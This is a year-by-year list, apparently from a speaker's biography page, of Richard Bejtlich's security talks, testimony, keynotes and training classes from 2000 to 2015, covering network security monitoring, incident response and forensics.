- Mr. Bejtlich testified to the House Oversight and Government Reform Subcommittee on Information Technology on 18 March 2015.
- Mr. Bejtlich testified to the House Energy and Commerce Committee on 3 March 2015.
- Mr. Bejtlich spoke on a panel at the Washington Business Journal cyber conference on 26 February 2015.
- Mr. Bejtlich spoke on a panel at the Wall Street Journal CIO Network conference on 3 February 2015.
- Mr. Bejtlich testified to the Senate Committee on Homeland Security and Government Affairs on 28 January 2015.
- 2014
-
- Mr. Bejtlich taught Network Security Monitoring 101 at Black hat Trainings 2014: 8-9 December 2014 / Potomac, MD.
- Mr. Bejtlich organized and hosted the Management track at the 5th annual Mandiant MIRCon on 8-9 October 2014.
- Mr. Bejtlich delivered the keynote address at the inaugural Security Onion conference on 12 September 2014 in Augusta, GA.
- Mr. Bejtlich delivered the keynote address (video) at the inaugural ArchC0n conference on 6 September 2014 in St Louis, MO.
- Mr. Bejtlich taught Network Security Monitoring 101 at Black Hat USA 2014: 4-5 August 2014 / Las Vegas, NV.
- Mr. Bejtlich spoke at the US Cyber Crime Conference on 29 April 2014. Video online at Youtube.
- Mr. Bejtlich recorded a Webcast titled Defining and Justifying an Advanced Security Program for FireEye on 17 March 2014.
- Mr. Bejtlich participated in a podcast titled Ukraine Crisis, Target Breach, and Edward Snowden: What's Next for U.S. Cyber Policy? for the Brookings Institution on 13 March 2014.
- Mr. Bejtlich participated on a panel hosted by the Center for National Policy on Building a cybersecurity roadmap: A Monitor, Center for National Policy seminar on 12 February 2014.
- Mr. Bejtlich spoke about digital security at the Boston Infragard quarterly meeting on 11 February 2014.
- Mr. Bejtlich delivered a lecture on digital security at West Point on 15 January 2014.
- Mr. Bejtlich spoke about digital security at seminars supporting the DoD Minerva Initiative at MIT and Harvard Kennedy School on 7-8 January 2014.
- 2013
-
- Mr. Bejtlich taught Network Security Monitoring 101 at Black Hat Seattle 2013: 9-10 December 2013 / Seattle, WA.
- Mr. Bejtlich offered a guest lecture on digital security at George Washington University on 23 November 2013.
- Mr. Bejtlich spoke about digital security at the Mid-Atlantic CIO Council on 21 November 2013.
- Mr. Bejtlich was a panelist at the Brookings Institute on 19 November 2013.
- Mr. Bejtlich offered several guest lectures on digital security at the Massachusetts Institute of Technology on 18 November 2013.
- Mr. Bejtlich was a panelist at the Atlantic Council on 15 November 2013.
- Mr. Bejtlich organized and hosted the Management track at the 4th annual Mandiant MIRCon on 5-6 November 2013.
- Mr. Bejtlich was a panelist at the Free Thinking Film Festival on 2 November 2013.
- Mr. Bejtlich offered the keynote at the Cyber Ark user conference on 30 October 2013.
- Mr. Bejtlich was a panelist at the Indiana University Center for Applied Cybersecurity Research on 21 October 2013.
- Mr. Bejtlich spoke at the national ISSA conference on 10 October 2013.
- Mr. Bejtlich was a panelist at the Politico Cyber 7 event on 8 October 2013.
- Mr. Bejtlich offered the keynote at the BSides August 2013 conference on 14 September 2013.
- Mr. Bejtlich taught Network Security Monitoring 101 at Black Hat USA 2013: 27-28 and 29-30 July 2013 / Las Vegas, NV.
- Mr. Bejtlich was a panelist at the Chatham House Cyber Security Conference in London, England on 10 June 2013.
- Mr. Bejtlich appeared in the documentary Hacked, first available 7 June 2013.
- Mr. Bejtlich was interviewed at the Center for National Policy, with video archived, on 15 May 2013.
- Mr. Bejtlich delivered a keynote at the IT Web Security Summit in Johannesburg, South Africa on 8 May 2013.
- Mr. Bejtlich was a panelist at The George Washington University and US News & World Report Cybersecurity Conference on 26 April 2013.
- Mr. Bejtlich testified to the House Committee on Foreign Affairs on 21 March 2013.
- Mr. Bejtlich testified to the House Committee on Homeland Security on 20 March 2013.
- Mr. Bejtlich testified to the Senate Armed Services Committee on 19 March 2013.
- Mr. Bejtlich shared his thoughts on the APT1 report with the Federalist Society on 12 March 2013. The conference call was recorded as Cybersecurity And the Chinese Hacker Problem - Podcast.
- 2012
-
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat Abu Dhabi 2012: 3-4 Dec / Abu Dhabi, UAE.
- Mr. Bejtlich spoke at a Mandiant breakfast event in Calgary, AB on 28 Nov 2012.
- Mr. Bejtlich spoke at AppSecUSA in Austin, TX on 26 Oct 2012. The talk Incident Response: Security After Compromise is posted as a video (42 min).
- Mr. Bejtlich organized and hosted the Management track at the 3rd annual Mandiant MIRCon on 17-18 October 2012.
- Mr. Bejtlich spoke at a SANS event in Baltimore, MD on 5 Oct 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event in Dallas, TX on 13 Sep 2012.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat USA 2012: 21-22 and 23-24 Jul / Las Vegas, NV.
- Mr. Bejtlich taught a compressed version of TCP/IP Weapons School 3.0 at a U.S. Cyber Challenge Summer Camp in Ballston, VA on 28 Jun 2012.
- Mr. Bejtlich participated on a panel titled Hackers vs Executives at the Forrester conference in Las Vegas on 25 May 2012.
- Mr. Bejtlich spoke at the Cyber Security for Executive Leadership: What Every CEO Should Know event in Raleigh, NC on 11 May 2012.
- Mr. Bejtlich participated on a panel titled SEC Cyber Security Guidelines: A New Basis for D&O Exposure? at the 8th Annual National Directors & Officers Insurance ExecuSummit in Uncasville, CT on 8 May 2012.
- Mr. Bejtlich delivered the keynote to the 2012 National Cyber Crime Conference in Norwood, MA on 30 Apr 2012.
- Mr. Bejtlich spoke at the FOSE conference on a panel discussing new attacks on 4 Apr 2012.
- Mr. Bejtlich testified to the US-China Economic and Security Review Commission on 26 Mar 2012.
- Mr. Bejtlich spoke at the Air Force Association CyberFutures conference (audio mp3) on 23 Mar 2012.
- Mr. Bejtlich delivered the keynote to the IANS Research Mid-Atlantic conference on 21 Mar 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event with Secretary Michael Chertoff in New York, NY on 15 Mar 2012.
- Mr. Bejtlich spoke to the Augusta, GA ISSA chapter on 8 Mar 2012.
- Mr. Bejtlich participated on a panel about digital threats at the RSA Executive Security Action Forum on 27 Feb 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event with Gen (ret.) Michael Hayden in Washington, DC on 22 Feb 2012.
- Mr. Bejtlich spoke at the ShmooCon Epilogue conference on 30 Jan 2012.
- Mr. Bejtlich spoke at a Mandiant breakfast event with Secretary Michael Chertoff in Houston, TX on 12 Jan 2012.
- 2011
-
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat Abu Dhabi 2011: 12-13 Dec / Abu Dhabi, UAE.
- Mr. Bejtlich organized and hosted the Management track at the 2nd annual Mandiant MIRCon on 5-6 November 2011.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0, 26-27 Oct 2011 in McLean, VA.
- Mr. Bejtlich offered the keynote at the HawaiianTel 2011 Business Security Conference on 7 Sep 2011 in Honolulu, HI.
- Mr. Bejtlich participated in a panel titled Why Bad Breaches Happen To Good Companies on 25 Aug 2011.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at USENIX Security: 8-9 Aug / San Francisco, CA.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat USA 2011: 30-31 Jul and 1-2 Aug / Las Vegas, NV.
- Mr. Bejtlich participated in the Attacking Cyber Security Marketecture panel at BSidesSanFrancisco: 1100-1145 15 Feb / San Francisco, CA. Video available at Livestream with the talk starting at 12:35.
- Mr. Bejtlich participated in a panel at the e10+ Experienced Security event at RSA Conference USA 2011: 0730-1200 14 Feb / San Francisco, CA.
- Mr. Bejtlich presented "Cooking the Cuckoo's Egg" at the DoJ Cybersecurity Conference: 1100-1145 08 Feb / Washington, DC.
- Mr. Bejtlich presented Building a Fortune 5 CIRT Under Fire (twice) and participated in an APT panel at DoD Cybercrime: 26 Jan 2011 / Atlanta, GA.
- Mr. Bejtlich taught TCP/IP Weapons School 3.0 at Black Hat DC 2011: 16-17 Jan 2011 / Arlington, VA.
- 2010
-
- Mr. Bejtlich presented to the TechTarget Emerging Threats forum on 16 Nov 2010 / New York, NY.
- Mr. Bejtlich participated in the MANDIANT MirCon Wrap-Up Webcast on 19 Oct 2010.
- Mr. Bejtlich spoke on the Incident Response Dream Team Panel at the first annual Mandiant MIRCon, 12-13 Oct 2010 / Alexandria, VA.
- Mr. Bejtlich offered a guest lecture on digital security at Loyola University Maryland on 11 Oct 2010.
- Mr. Bejtlich presented to the TechTarget Emerging Threats forum on 28 Sep 2010 / Seattle, WA.
- Mr. Bejtlich delivered the VizSec 2010 keynote on 14 Sep 2010, and then attended RAID 2010 15-17 Sep 2010 / Ottawa, Canada.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat USA 2010: 24-25 and 26-27 Jul 2010 / Las Vegas, NV.
- Mr. Bejtlich presented CIRT-Level Response to APT at
- SANS WhatWorks in Incident Response and Forensic Solutions 2010: 8-9 Jul 2010 / Washington, DC
- Mr. Bejtlich presented Building a Fortune 5 CIRT Under Fire at FIRST 2010 18 Jun 2010 / Miami, FL
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat Europe 2010: 12-13 Apr 2010 / Barcelona, Spain.
- Mr. Bejtlich offered a guest lecture on digital security at Georgetown University on 22 March 2010.
- Mr. Bejtlich offered a guest lecture on digital security at the United States Naval Academy on 2 March 2010.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat DC 2010: 31 Jan - 1 Feb 2010 / Arlington, VA.
- 2009
-
- Mr. Bejtlich organized and led the SANS WhatWorks in Incident Detection Summit 2009, 9-10 Dec 09 / Washington, DC.
- Mr. Bejtlich offered a keynote and participated in panels at DojoCon, 6-7 Nov 09 / MD
- Mr. Bejtlich offered a keynote and class at the Information Security Summit, 29-30 Oct 09 / Corporate College East, Warrensville Heights, OH.
- Mr. Bejtlich participated in a panel titled The Laws of Vulnerabilities at Black Hat USA 2009 on 29 July 2009.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat USA 2009: 25-26 and 27-28 July 2009 / Caesars Palace, Las Vegas, NV.
- Mr. Bejtlich delivered the keynote at the SANS WhatWorks Summit in Forensics and Incident Response 2009, 6-7 July 2009 / The Fairmont Washington, Washington, DC.
- Mr. Bejtlich offered a guest lecture on digital security at the United States Air Force Academy on 1 May 2009.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat Europe 2009 Training: 14-15 April 2009 / Moevenpick Hotel Amsterdam City Centre, Amsterdam, The Netherlands.
- Mr. Bejtlich taught TCP/IP Weapons School 2.0 at Black Hat DC 2009 Training: 16-17 February 2009 / Hyatt Regency Crystal City, Arlington, VA.
- Mr. Bejtlich presented Network Security Monitoring Using FreeBSD at DC BSDCon 2009, 6 February 2009 / Washington Marriott Wardman Park, Washington, DC.
- 2008
-
- Mr. Bejtlich delivered the keynote at the 1st ACM Workshop on Network Data Anonymization (NDA 2008), 31 October 2008 / Hilton Alexandria Mark Center, Alexandria, VA.
- Mr. Bejtlich offered a guest lecture on digital security at Johns Hopkins University on 20 October 2008.
- Mr. Bejtlich delivered the keynote on the second day of the SANS WhatWorks in Incident Response and Forensic Solutions Summit 2008, 13-14 October 2008 / Caesars Palace, Las Vegas, NV.
- Mr. Bejtlich taught TCP/IP Weapons School at Black Hat USA 2008 Training: 2-3 and 4-5 August 2008 / Caesars Palace, Las Vegas, NV
- Mr. Bejtlich provided the keynote ate Detection of Intrusions and Malware & Vulnerability Assessment: 10-11 July 2008 / France Telecom R&D / Orange Labs, Issy les Moulineaux, near Paris, France
- Mr. Bejtlich taught Network Security Operations at TechnoSecurity 2008: 31 May 2008 / Myrtle Beach Marriott Resort, Myrtle Beach, SC
- Mr. Bejtlich taught TCP/IP Weapons School at Black Hat DC 2008: 18-19 February 2008 / Westin Hotel, Washington, DC
- 2007
-
- Mr. Bejtlich offered a guest lecture on digital security at George Mason University on 29 November 2007.
- Network Security Operations: 27-29 August 2007 / public 3 day class / Chicago, IL
- Mr. Bejtlich spoke to the Chicago Electronic Crimes Task Force and the Chicago Snort Users Group on 30 and 29 August 2007, respectively.
- Mr. Bejtlich taught Network Security Operations on 21-23 August 2007 / Cincinnati, OH
- Mr. Bejtlich taught TCP/IP Weapons School (layers 4-7) at USENIX Security 2007: 6-7 August 2007 / Boston, MA.
- Mr. Bejtlich taught TCP/IP Weapons School at Black Hat USA 2007: 28-29 and 30-31 July 2007 / Caesars Palace, Las Vegas, NV.
- USENIX 2007: 20-22 June 2007 / Network Security Monitoring and TCP/IP Weapons School (Layers 2-3) tutorials / Santa Clara, CA
- Mr. Bejtlich briefed GFIRST 2007: 25-26 June 2007 / Network Incident Response and Forensics (two half-day tutorials) and Traditional IDS Should Be Dead conference presentation / Orlando, FL
- Mr. Bejtlich taught TCP/IP Weapons School (Layers 2-3) and briefed Open Source Network Forensics at Techno Security 2007: 5-7 June 2007 / / Myrtle Beach, SC.
- Mr. Bejtlich briefed Open Source Network Forensics at ISS World Spring 2007: 31 May 2007 / Washington, DC
- Mr. Bejtlich briefed Network Incident Response and Forensics at AusCERT 2007: 23-24 May 2007 / Gold Coast, Australia.
- Mr. Bejtlich taught Network Security Monitoring: 25 May 2007 / Sydney, Australia.
- Mr. Bejtlich briefed at CONFIDENCE 2007: 13 May 2007 / Krakow, Poland.
- Mr. Bejtlich briefed at ShmooCon: 24 March 2007 / Washington, DC; video here.
- 2006
-
- Mr. Bejtlich presented a special two evening training class, Enterprise Network Instrumentation, on 14-15 December 2006, at SANS CDI East 2006. More details are posted here.
- Mr. Bejtlich presented TCP/IP Weapons School Part 2 on 9-10 December 2006, after USENIX LISA in Washington, DC.
- Mr. Bejtlich taught days one and two of TCP/IP Weapons School on 3 and 4 December 2006 at USENIX LISA in Washington, DC. He also taught Network Security Monitoring with Open Source Tools on 8 December 2006.
- Mr. Bejtlich appeared on the Tenable Webinar at 1000 ET on Friday 17 November 2006.
- Mr. Bejtlich participated in the DE Communications Inside Job Webinar at 11 ET on Thursday 9 November 2006.
- Mr. Bejtlich spoke at the Net Optics Think Tank in Fairfax, VA on Tuesday, 26 September 2006 from 1215-1315.
- Mr. Bejtlich spoke at the 2006 FFIEC Information Technology Conference in Arlington, VA on Wednesday, 23 August 2006 from 0830-1000.
- Mr. Bejtlich taught TCP/IP Weapons School at USENIX Security 2006 in Vancouver, BC on 31 July and 1 August 2006.
- Mr. Bejtlich spoke at the 2006 FIRST Conference in Baltimore, MD on Friday, 30 June 2006 from 1500 to 1530.
- Mr. Bejtlich spoke at the 2006 Techno Security Conference in Myrtle Beach, SC on Tuesday, 6 June 2006. From 0800-0930 he presented Enterprise Network Instrumentation Fundamentals. From 1000-1200 he presented Enterprise Network Instrumentation: Advanced Topics. At 1530 he joined Ron Gula, Marcus Ranum, Ross Rogers, and Johnny Long for a security panel discussion.
- Mr. Bejtlich taught a one day course on Network Security Monitoring with Open Source Tools at the USENIX 2006 Annual Technical Conference in Boston, MA on Friday, 2 June 2006.
- Mr. Bejtlich offered a guest lecture at the University of Cambridge Computer Laboratory Security Group Seminar Series in Cambridge, UK, on Friday 19 May 2006 on network security monitoring.
- Mr. Bejtlich spoke at the 2006 Computer and Enterprise Investigations Conference in Lake Las Vegas, NV on Thursday, 4 May 2006 from 1400-1530 on Network Forensics.
- Mr. Bejtlich spoke at the US-CERT 2006 GFIRST Conference in Orlando, FL on Monday, 1 May 2006 from 1030-1200 on Network Incident Response.
- Mr. Bejtlich spoke at the Network Security 2006 Conference in Reston, VA on Monday, 17 April 2006 from 1845 to 1945.
- Mr. Bejtlich spoke at the 2006 Rocky Mountain Information Security Conference in Denver, CO on Wednesday, 5 April 2006 on Network Incident Response.
- Mr. Bejtlich spoke at the RSA Conference 2006 in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject was Traffic-Centric Incident Response and Forensics.
- Mr. Bejtlich spoke at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject was Network Security Monitoring with Sguil.
- Mr. Bejtlich delivered presentations on network incident response and network forensics at the 2006 DoD Cybercrime Conference in Palm Harbor, FL on 11 January 2006.
- 2005
-
- Mr. Bejtlich presented three full-day tutorials at USENIX LISA 2005 in San Diego, CA, from 6-8 December 2005. He taught network security monitoring, incident response, and forensics.
- Mr. Bejtlich spoke at the Cisco Fall 2005 System Engineering Security Virtual Team Meeting in San Jose, CA on 10 October 2005.
- Mr. Bejtlich spoke at the Net Optics Think Tank at the Hilton Santa Clara in Santa Clara, CA on 21 September 2005. He discussed network forensics, with a preview of material in his next book Real Digital Forensics.
- Mr. Bejtlich taught network security monitoring to security analysts from the Pentagon with Special Ops Security on 23 and 24 August 2005 in Rosslyn, VA.
- Mr. Bejtlich spoke at the InfraGard 2005 National Conference on 9 August 05 in Washington, DC on the basics of network forensics.
- Mr. Bejtlich taught a one day course on network incident response, with his forensics book as the background material, at USENIX Security 05 on 1 August 2005 in Baltimore, MD.
- Mr. Bejtlich taught a one day course on network security monitoring, with his NSM book as the background material, at USENIX Security 05 on 31 July 2005 in Baltimore, MD.
- Mr. Bejtlich offered a guest lecture on digital security at George Washington University on 23 June 2005.
- Mr. Bejtlich spoke at the Techno Security 2005 conference on 13 June 2005 in Myrtle Beach, CA. He was invited by Tenable Security to appear at their evening social event.
- Mr. Bejtlich spoke at the Net Optics Think Tank on 18 May 2005 in Sunnyvale, CA.
- Mr. Bejtlich presented Keeping FreeBSD Up-To-Date and More Tools for Network Security Monitoring at BSDCan 2005 on 13 May 2005.
- Mr. Bejtlich spoke to the Pentagon Security Forum on 19 April 2005.
- Mr. Bejtlich taught a one day course on network security monitoring, with his book as the background material, at USENIX 05 on 14 April 2005 in Anaheim, CA.
- Mr. Bejtlich spoke to the Government Forum of Incident Response and Security Teams (GFIRST) on 5 April 2005 in Orlando, FL.
- Mr. Bejtlich spoke to the Information Systems Security Association of Northern Virginia (ISSA-NoVA) on 17 February 2005 in Reston, VA.
- Mr. Bejtlich spoke at the 2005 DoD Cybercrime Conference on 13 January 2005 in Palm Harbor, FL.
- 2004
-
- Mr. Bejtlich spoke to the DC Systems Administrators Guild (DC-SAGE) on 21 October 2004 about Sguil.
- Mr. Bejtlich spoke to the DC Linux Users Group on 15 September 2004 about Sguil.
- Mr. Bejtlich spoke to the High Technology Crime Investigation Association International Conference and Expo 2004 on 13 September 2004 in Washington, DC about Sguil.
- Mr. Bejtlich taught a one day course on network security monitoring, with his first book as the background material, at USENIX Security 04 on 9 August 2004 in San Diego.
- Mr. Bejtlich spoke to the DC Snort User's Group on 24 Jun 2004 about Sguil.
- Mr. Bejtlich presented Network Security Monitoring with Sguil (.pdf) at BSDCan on 14 May 2004.
- Mr. Bejtlich spoke to the SANS Local Mentor program in northern Virginia for two hours on 11 May 2004 about NSM using Sguil. Joe Bowling invited him.
- Mr. Bejtlich gave a lightning talk demo of Sguil at CanSecWest 04 on 22 April 2004.
- 2003
-
- Mr. Bejtlich spoke to ISSA-CT about network security monitoring on 9 December 2003.
- Mr. Bejtlich taught Foundstone's Ultimate Hacking Expert class at Black Hat Federal 2003 in Tyson's Corner, 29-30 September 2003.
- Mr. Bejtlich recorded a second webcast on network security monitoring for SearchSecurity.com. He posted the slides here.
- Mr. Bejtlich taught the first day of Foundstone's Ultimate Hacking Expert class at Black Hat USA 2003 Training in Las Vegas on 28 July 2003.
- Mr. Bejtlich spoke on 21 July 2003 in Washington, DC at the SANS NIAL conference.
- Mr. Bejtlich discussed digital security in Toronto on 13 March 2003 and in Washington, DC on Tuesday, 25 March 2003 at the request of Watchguard.
- Mr. Bejtlich taught days four, five, and six of the SANS intrusion detection track in San Antonio, Texas from 28-30 January 2003.
- 2002
-
- Mr. Bejtlich recorded a webcast on network security monitoring (PDF slides) with his friend Bamm Visscher for SearchSecurity.com and answered questions submitted by listeners. A SearchSecurity editor commented on the talk as well.
- Mr. Bejtlich helped teach Foundstone's Ultimate Hacking class at Black Hat USA 2002 Training in Las Vegas on 29-30 July 2002.
- Mr. Bejtlich taught days one, two, and three of the SANS intrusion detection track in San Antonio, Texas from 15-17 July 2002.
- Mr. Bejtlich taught day four of the SANS intrusion detection track in Toronto, Ontario on 16 May 2002.
- On 11 April 2002 Mr. Bejtlich briefed the South Texas ISSA chapter on Snort.
- Mr. Bejtlich helped teach day four of the SANS intrusion detection track in San Antonio, Texas on 14 March 2002 after Marty Roesch was unable to teach the class.
- 2000-2001
-
- On 24-25 October 2001 Mr. Bejtlich spoke to the Houston InfraGard chapter at their 2001 conference.
- In August and September 2001 Mr. Bejtlich briefed analysts at the AFCERT on Interpreting Network Traffic.
- On 19 October 2000 Mr. Bejtlich was invited back to speak at the SANS Network Security 2000 Technical Conference.
- During 14-16 August 2000 Mr. Bejtlich participated in the Cyber Summit 2000 sponsored by the Air Intelligence Agency. Mr. Bejtlich was a captain in the AFCERT. You will find him in the middle of this picture.
- In June 2000 Mr. Bejtlich signed a letter protesting the Council of Europe draft treaty on Crime in Cyberspace.
- In June 2000 Mr. Bejtlich briefed FIRST on third party effects. This predated CAIDA's 2001 USENIX "backscatter" paper.
- On 25 March 2000 Mr. Bejtlich presented Interpreting Network Traffic: A Network Intrusion Detector's Look at Suspicious Events at the SANS 2000 Technical Conference.